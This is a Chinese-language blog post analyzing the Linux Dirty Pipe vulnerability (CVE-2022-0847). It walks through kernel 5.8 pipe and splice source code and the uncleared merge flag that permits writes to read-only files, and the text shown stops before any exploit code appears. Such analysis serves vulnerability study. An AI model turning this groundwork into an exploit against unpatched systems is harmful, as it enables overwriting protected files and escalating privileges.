CVE-2022-0847(Dirty Pipe) Remake

本文最后更新于:2024年3月22日 早上

0x00:写在一切之前

Dirty系列第二弹

因为该漏洞发现在对管道写入数据后,读取完毕后未清空pipe_buffer->flags,造成越权写入只读文件

Dirty Cow很像,因此被冠以Dirty Pipe的称呼

但是和Dirty Cow需要线程竞争相比,Dirty Pipe稳定许多

PS:下文所有源码的版本为 5.8

0x01:信息收集

NVD - cve-2022-0847 (nist.gov)

影响版本:

0x02:前置知识

何为导管🤔

何为管道?好问题,所谓管道,就是连接一个写进程与一个读进程,用于两进程间通信的共享文件,又称pipe文件

向管道(共享文件)提供输入的发送进程(即写进程),以字符流形式将大量的数据送入管道;而接收管道输出的接收进程(即读进程),可从管道中接收数据。由于发送进程和接收进程是利用管道进行通信的,故又称管道通信。

为了协调双方的通信,管道通信机制必须提供以下3 方面的协调能力。

  • 互斥。当一个进程正在对 pipe 进行读/写操作时,另一个进程必须等待。
  • 同步。当写(输入)进程把一定数量(如4KB)数据写入 pipe 后,便去睡眠等待,直到读(输出)进程取走数据后,再把它唤醒。当读进程读到一空 pipe 时,也应睡眠等待,直至写进程将数据写入管道后,才将它唤醒。
  • 对方是否存在。只有确定对方已存在时,才能进行通信。

pipe の 调用链

接下来就来看看pipe的实现过程

1
2
3
4
5
do_pipe2
__do_pipe_flags
create_pipe_files
get_pipe_inode
alloc_pipe_info

do_pipe2

pipepipe2都是系统调用,都是do_pipe2的套娃,不同的是,pipe2能自己指定flags

1
2
3
4
5
6
7
8
9
SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}

SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
* sys_pipe() is the normal C calling standard for creating
* a pipe. It's not the way Unix traditionally does this, though.
*/
//fildes 是一个指向整数数组的指针,用于存储管道端点的文件描述符
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;
//核心函数:这个函数预计会创建一个管道,并返回相应的文件描述符和文件指针数组。如果调用成功,返回值为0
error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {//copy_to_user 成功,那么它将通过 fd_install 将文件描述符安装到内核中,以便用户空间可以通过这些文件描述符访问管道。
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}

__do_pipe_flags

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static int __do_pipe_flags(int *fd, struct file **files, int flags)
{
int error;
int fdw, fdr;

if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
return -EINVAL;

error = create_pipe_files(files, flags);//核心函数:来创建管道的文件对象
if (error)
return error;

//两次来获取未使用的文件描述符。如果获取失败,则跳转到错误处理部分。
error = get_unused_fd_flags(flags);
if (error < 0)
goto err_read_pipe;
fdr = error;

error = get_unused_fd_flags(flags);
if (error < 0)
goto err_fdr;
fdw = error;

audit_fd_pair(fdr, fdw);//记录文件描述符的配对情况
fd[0] = fdr;
fd[1] = fdw;
return 0;

err_fdr:
put_unused_fd(fdr);
err_read_pipe:
fput(files[0]);
fput(files[1]);
return error;
}

create_pipe_files

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
int create_pipe_files(struct file **res, int flags)
{
struct inode *inode = get_pipe_inode();//获取一个用于管道的 inode 对象
struct file *f;

if (!inode)
return -ENFILE;

if (flags & O_NOTIFICATION_PIPE) {
#ifdef CONFIG_WATCH_QUEUE
if (watch_queue_init(inode->i_pipe) < 0) {
iput(inode);
return -ENOMEM;
}
#else
return -ENOPKG;
#endif
}
//函数创建一个伪文件对象,该文件对象连接到之前获取的管道 inode 上。它将根据传入的标志设置文件的读写属性,并将其与管道的操作函数 pipefifo_fops 关联起来。如果创建失败,会释放之前分配的管道信息并释放 inode,然后返回相应的错误代码。
f = alloc_file_pseudo(inode, pipe_mnt, "",
O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
&pipefifo_fops);
if (IS_ERR(f)) {
free_pipe_info(inode->i_pipe);
iput(inode);
return PTR_ERR(f);
}
//对创建的写入端文件对象设置私有数据指针指向管道的 inode。
f->private_data = inode->i_pipe;
//调用 alloc_file_clone 函数创建一个克隆的文件对象作为读取端,同时将其与管道的操作函数 pipefifo_fops 关联起来。如果创建失败,会释放之前分配的管道信息、释放写入端文件对象并返回相应的错误代码。
res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
&pipefifo_fops);
if (IS_ERR(res[0])) {
put_pipe_info(inode, inode->i_pipe);
fput(f);
return PTR_ERR(res[0]);
}
res[0]->private_data = inode->i_pipe;
res[1] = f;
stream_open(inode, res[0]);
stream_open(inode, res[1]);
return 0;
}

get_pipe_inode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;

if (!inode)
goto fail_inode;

inode->i_ino = get_next_ino();
//分配一个新的管道信息结构体 pipe_inode_info,用于存储管道的状态信息
pipe = alloc_pipe_info();
if (!pipe)
goto fail_iput;

inode->i_pipe = pipe;
pipe->files = 2;
pipe->readers = pipe->writers = 1;
//将管道的操作函数 pipefifo_fops 赋值给 inode 的文件操作符 i_fop
inode->i_fop = &pipefifo_fops;

/*
* Mark the inode dirty from the very beginning,
* that way it will never be moved to the dirty
* list because "mark_inode_dirty()" will think
* that it already _is_ on the dirty list.
*/
//设置 inode 的状态为 I_DIRTY,表示该 inode 是脏的,需要同步到磁盘上。
inode->i_state = I_DIRTY;
inode->i_mode = S_IFIFO | S_IRUSR | S_IWUSR;
inode->i_uid = current_fsuid();
inode->i_gid = current_fsgid();
inode->i_atime = inode->i_mtime = inode->i_ctime = current_time(inode);

return inode;

fail_iput:
iput(inode);

fail_inode:
return NULL;
}

alloc_pipe_info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
//默认数量为 PIPE_DEF_BUFFERS (16)个,即一个管道初始默认可以存放 16 张页面的数据
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
//user 是指向当前用户信息结构体的指针,通过 get_current_user() 函数获取
struct user_struct *user = get_current_user();
unsigned long user_bufs; //计算出当前用户可用的管道缓冲区数量 user_bufs
unsigned int max_size = READ_ONCE(pipe_max_size);//从 pipe_max_size 中读取管道的最大size
//调用 kzalloc() 分配大小为 sizeof(struct pipe_inode_info) 的内存空间用于管道信息结构体。如果分配失败,将跳转到 out_free_uid 标签处释放用户结构体并返回 NULL。
pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;
//如果管道缓冲区数量乘以页大小大于最大尺寸,并且当前进程不具备 CAP_SYS_RESOURCE 能力,则将管道缓冲区数量调整为最大尺寸除以页大小。
if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;
//调用 account_pipe_buffers() 函数来计算当前用户可用的管道缓冲区数量 user_bufs
user_bufs = account_pipe_buffers(user, 0, pipe_bufs);
//如果当前用户的管道缓冲区数量超过软限制并且管道是由非特权用户创建的,则尝试降低管道缓冲区数量到软限制以下,并将管道缓冲区数量设置为1。
if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
user_bufs = account_pipe_buffers(user, pipe_bufs, 1);
pipe_bufs = 1;
}
//如果当前用户的管道缓冲区数量超过硬限制并且管道是由非特权用户创建的,则放弃创建管道,并跳转到 out_revert_acct 标签处进行清理。
if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
goto out_revert_acct;
//分配大小为 pipe_bufs 个 struct pipe_buffer 的内存空间,并将其赋值给 pipe->bufs,表示管道的缓冲区
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}

out_revert_acct:
(void) account_pipe_buffers(user, pipe_bufs, 0);
kfree(pipe);
out_free_uid:
free_uid(user);
return NULL;
}

pipe_inode_info

管道的实质是由一个 pipe_inode_info 结构体来管理的,其pipe_buffer类似于循环队列。在这个循环队列中,管道的写入操作是向队列头部添加数据(即往队列尾部移动),而读取操作则是从队列尾部获取数据(即从队列头部移动)。在管道的 pipe_inode_info 结构体中,head 成员表示队列头的索引,tail 成员表示队列尾的索引,头进尾出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};

pipe_buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

pipe的大体结构图如下所示(图来自A3👴的blog)

pipeの函数表

经过如下调用链

1
2
3
4
do_pipe2
__do_pipe_flags
create_pipe_files
alloc_file_pseudo
1
2
3
4
//函数创建一个伪文件对象,该文件对象连接到之前获取的管道 inode 上。它将根据传入的标志设置文件的读写属性,并将其与管道的操作函数 pipefifo_fops 关联起来。如果创建失败,会释放之前分配的管道信息并释放 inode,然后返回相应的错误代码。
f = alloc_file_pseudo(inode, pipe_mnt, "",
O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
&pipefifo_fops);

pipefifo_ops

1
2
3
4
5
6
7
8
9
10
const struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
};

重点关注读写操作

pipe_read

pipe中读取数据,会调用到pipe_read

一个接一个的读取buffer中的数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;//用于记录管道是否满了以及是否需要唤醒下一个读取者。
ssize_t ret;

/* Null read succeeds. */
//如果 total_len 为零,表示请求的读取长度为零,直接返回零,表示读取成功
if (unlikely(total_len == 0))
return 0;

ret = 0;
//使用 __pipe_lock 函数锁定管道,以确保在多线程环境下对管道的安全访问
__pipe_lock(pipe);

/*
* We only wake up writers if the pipe was full when we started
* reading in order to avoid unnecessary wakeups.
*
* But when we do wake up writers, we do so using a sync wakeup
* (WF_SYNC), because we want them to get going and generate more
* data for us.
*/
//如果管道的头部指针等于尾部指针加上最大使用量,则表示管道已满
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
//无限循环中,尝试从管道中读取数据,直到读取完成或出现错误
for (;;) {
/*head 表示管道中下一个要读取的数据位置。
tail 表示管道中下一个要写入数据的位置。
mask 是一个掩码,用于计算索引,确保索引不会超出缓冲区的范围。*/
unsigned int head = pipe->head;
unsigned int tail = pipe->tail;
unsigned int mask = pipe->ring_size - 1;

#ifdef CONFIG_WATCH_QUEUE
//如果管道的 note_loss 标志为真,并且待读取数据长度小于 8,说明缓冲区空间不足,返回错误码 -ENOBUFS。
if (pipe->note_loss) {
struct watch_notification n;

if (total_len < 8) {
if (ret == 0)
ret = -ENOBUFS;
break;
}

n.type = WATCH_TYPE_META;
n.subtype = WATCH_META_LOSS_NOTIFICATION;
n.info = watch_sizeof(n);
if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) {
if (ret == 0)
ret = -EFAULT;
break;
}
ret += sizeof(n);
total_len -= sizeof(n);
pipe->note_loss = false;
}
#endif
//如果管道非空,尝试从管道中读取数据
if (!pipe_empty(head, tail)) {

struct pipe_buffer *buf = &pipe->bufs[tail & mask];//获取当前尾部指针 tail 对应的管道缓冲区 buf
size_t chars = buf->len;//计算当前缓冲区中可读取的数据长度 chars
size_t written;
int error;
//如果缓冲区中的数据长度大于待读取数据长度 total_len,则将待读取数据长度更新为 total_len
if (chars > total_len) {
if (buf->flags & PIPE_BUF_FLAG_WHOLE) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
chars = total_len;
}
//确认管道缓冲区
error = pipe_buf_confirm(pipe, buf);
if (error) {
if (!ret)
ret = error;
break;
}
//从缓冲区中读取数据到目标缓冲区 to
written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
//更新返回值 ret、管道缓冲区中的偏移量和长度,并清理空的数据包缓冲区
ret += chars;
buf->offset += chars;
buf->len -= chars;

/* Was it a packet buffer? Clean up and exit */
if (buf->flags & PIPE_BUF_FLAG_PACKET) {
total_len = chars;
buf->len = 0;
}
//如果缓冲区已空,则释放缓冲区,并更新尾部指针 tail
if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
#ifdef CONFIG_WATCH_QUEUE
if (buf->flags & PIPE_BUF_FLAG_LOSS)
pipe->note_loss = true;
#endif
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}
//更新待读取数据长度 total_len
total_len -= chars;
//如果读取完成,则跳出循环;否则继续尝试读取更多数据
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}
//如果管道中没有写入者,跳出循环
if (!pipe->writers)
break;
//如果出现错误或已经读取到数据,则跳出循环
if (ret)
break;
//如果文件标志为非阻塞,并且管道为空,则返回错误码 -EAGAIN
if (filp->f_flags & O_NONBLOCK) {
ret = -EAGAIN;
break;
}
__pipe_unlock(pipe);

/*
* We only get here if we didn't actually read anything.
*
* However, we could have seen (and removed) a zero-sized
* pipe buffer, and might have made space in the buffers
* that way.
*
* You can't make zero-sized pipe buffers by doing an empty
* write (not even in packet mode), but they can happen if
* the writer gets an EFAULT when trying to fill a buffer
* that already got allocated and inserted in the buffer
* array.
*
* So we still need to wake up any pending writers in the
* _very_ unlikely case that the pipe was full, but we got
* no data.
*/
/*
在释放锁的情况下处理未读取任何数据的情况:
如果之前管道已满但未读取任何数据,则唤醒等待的写入者并发送异步通知。
如果因中断而退出,则返回错误码 -ERESTARTSYS
*/
if (unlikely(was_full)) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}

/*
* But because we didn't read anything, at this point we can
* just return directly with -ERESTARTSYS if we're interrupted,
* since we've done any required wakeups and there's no need
* to mark anything accessed. And we've dropped the lock.
*/
if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
return -ERESTARTSYS;

__pipe_lock(pipe);
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
wake_next_reader = true;
}
if (pipe_empty(pipe->head, pipe->tail))
wake_next_reader = false;
__pipe_unlock(pipe);

if (was_full) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}
if (wake_next_reader)
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
if (ret > 0)
file_accessed(filp);
return ret;
}

pipe_write

pipe中写入,会调用到pipe_write

首先,如果上一个buffer中有剩余空间,并且此bufferflagPIPE_BUF_FLAG_CAN_MERGE,会先将此buffer写满

若还有多的数据,会申请新的buffer,将flag设置为PIPE_BUF_FLAG_CAN_MERGE,继续写入

由此可见,PIPE_BUF_FLAG_CAN_MERGE决定了buffer有无写入权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;

/* Null write succeeds. */
//如果待写入数据长度为零,则直接返回成功
if (unlikely(total_len == 0))
return 0;
//锁定管道以确保并发写入时的数据一致性
__pipe_lock(pipe);
//检查是否有读取者,如果没有读取者,则发送 SIGPIPE 信号并返回错误码 -EPIPE
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}

#ifdef CONFIG_WATCH_QUEUE
//检查是否启用了监视队列,如果启用了,则返回错误码 -EXDEV
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif

/*
* Only wake up if the pipe started out empty, since
* otherwise there should be no readers waiting.
*
* If it wasn't empty we try to merge new data into
* the last buffer.
*
* That naturally merges small writes, but it also
* page-aligs the rest of the writes for large writes
* spanning multiple pages.
*/
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);//判断管道是否为空,如果为空,则标记 was_empty 为真
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {//如果新数据长度不为零且管道不为空,则尝试将新数据与上一个缓冲区合并
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;
//如果flag中有PIPE_BUF_FLAG_CAN_MERGE,便把数据写入上一个buffer的剩余空间中
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;

ret = copy_page_from_iter(buf->page, offset, chars, from);//拷贝进去
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}
//进入一个无限循环,直到成功写入数据或遇到错误
for (;;) {
//检查是否有读取者,如果没有读取者,则发送 SIGPIPE 信号并返回错误码 -EPIPE
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
//检查管道是否未满,如果未满,则分配一个新的缓冲区用于写入数据
head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

/* Allocate a slot in the ring in advance and attach an
* empty buffer. If we fault or otherwise fail to use
* it, either the reader will consume it or it'll still
* be there for the next write.
*/
spin_lock_irq(&pipe->rd_wait.lock);

head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);

/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
if (is_packetized(filp))//设置 buffer 的 flag,若设置了 O_DIRECT 则为 PACKET
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;

copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;

if (!iov_iter_count(from))
break;
}

if (!pipe_full(head, pipe->tail, pipe->max_usage))
continue;

/* Wait for buffer space to become available. */
//如果文件标志为非阻塞,则返回错误码 -EAGAIN
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
//如果当前进程有信号等待,则返回错误码 -ERESTARTSYS
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}

/*
* We're going to release the pipe lock and wait for more
* space. We wake up any readers if necessary, and then
* after waiting we need to re-check whether the pipe
* become empty while we dropped the lock.
*/
//释放管道锁并等待缓冲区空间变得可用,唤醒任何可能正在等待读取的进程。待等待结束后,重新获取管道锁并重新检查管道是否为空,以确定是否需要继续执行写入操作。
__pipe_unlock(pipe);
if (was_empty) {
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
__pipe_lock(pipe);
was_empty = pipe_empty(pipe->head, pipe->tail);
wake_next_writer = true;
}
out:
//在写入完成后,如果之前管道已满,则取消唤醒下一个写入者的操作
if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
wake_next_writer = false;
__pipe_unlock(pipe);

/*
* If we do do a wakeup event, we do a 'sync' wakeup, because we
* want the reader to start processing things asap, rather than
* leave the data pending.
*
* This is particularly important for small writes, because of
* how (for example) the GNU make jobserver uses small writes to
* wake up pending jobs
*/
//解锁管道,并根据情况唤醒等待的读取者或写入者
if (was_empty) {
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
//如果写入成功且成功获取了文件系统写锁,则更新文件的访问时间
if (wake_next_writer)
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
int err = file_update_time(filp);
if (err)
ret = err;
sb_end_write(file_inode(filp)->i_sb);
}
//返回写入的总字节数 ret
return ret;
}

何为splice

一般来说,想要把一个文件的数据拷贝到另一个文件中,常规思路便是打开文件1,复制到用户空间,写入文件2

但这样用户空间和内核空间之间要进行多次用户拷贝,存在客观的开销

所以这时候便要提到splice这个用于在两个文件描述符之间移动数据的系统调用啦

splice 函数是在 Unix/Linux 系统中用于在两个文件描述符之间移动数据的系统调用之一。它通常用于优化数据传输,特别是在文件和管道之间进行零拷贝传输。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <fcntl.h>
ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

参数说明
fd_in:输入文件描述符,数据将从这里读取。
off_in:输入文件的偏移量指针,如果为 NULL,则使用当前文件偏移量。
fd_out:输出文件描述符,数据将写入到这里。
off_out:输出文件的偏移量指针,如果为 NULL,则使用当前文件偏移量。
len:要移动的数据的长度。
flags:标志参数,可以是以下之一或它们的组合:
SPLICE_F_MOVE:默认行为,表示将数据从输入文件描述符移动到输出文件描述符,这意味着数据在移动后不再存在于输入文件描述符上。
SPLICE_F_NONBLOCK:非阻塞模式,如果设置了此标志,函数将以非阻塞模式运行。
SPLICE_F_MORE:提示内核等待更多数据,如果设置了此标志,则告诉内核还有更多数据需要移动。这可能会增加性能。
SPLICE_F_GIFT:表示将数据所有权移动到输出文件描述符,而不是仅移动数据本身。

PS:将fd_in传递到文件描述符fd_out,其中文件描述符之一必须引用管道,对于fd_in来说,若其是一个管道文件描述符,则off_in必须被设置为NULL,若它不是一个管道描述符,则off_in表示从输入数据流的何处开始读入数据,此时,其被设置为NULL,则说明从输入数据的当前偏移位置读入。否则off_in指出具体的偏移位置。以上对于fd_outoff_out同样适用,只不过其用于输出数据流。

splice & pipe

针对上述情况,我们只许创建一个管道,然后通过两次splice便能完成两个文件间的数据拷贝

大概样例如下所示

1
2
3
4
5
6
7
8
......
pipe(pipe_fd);
src_fd = open("source_file", O_RDWR);
splice(tar_fd, NULL, pipe_fd[1], NULL, 0x100, SPLICE_F_MOVE);

dest_fd = open("dest_file", O_RDWR);
splice(pipe_fd[0], NULL, dest_fd, NULL, 0x100, SPLICE_F_MOVE);
......

无需进行内核空间和用户空间的拷贝,直接在内核完成一条龙服务

do_splice

根据管道->管道、文件->管道、文件->管道,分为三个分支

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
/*
* Determine where to splice to/from.
*/
long do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;

//通过检查输入和输出文件描述符的模式(mode)来确保它们是可读和可写的文件描述符。如果其中一个不符合要求,则返回错误码-EBADF,表示无效的文件描述符。
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;

//使用get_pipe_info()函数获取输入和输出文件描述符对应的管道信息
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);

//如果两者都是管道,则进行管道到管道的splice操作
if (ipipe && opipe) {
//尝试在管道上执行具有指定偏移量的操作,这在管道操作中是不被允许的
if (off_in || off_out)
return -ESPIPE;

/* Splicing to self would be fun, but... */
//检查输入管道和输出管道是否相同。如果它们相同,表示尝试将数据从管道拷贝到自身,这是没有意义的操作
if (ipipe == opipe)
return -EINVAL;

//检查输入文件和输出文件的标志,如果其中任何一个设置了O_NONBLOCK标志,则将SPLICE_F_NONBLOCK标志添加到flags中
if ((in->f_flags | out->f_flags) & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

return splice_pipe_to_pipe(ipipe, opipe, len, flags);
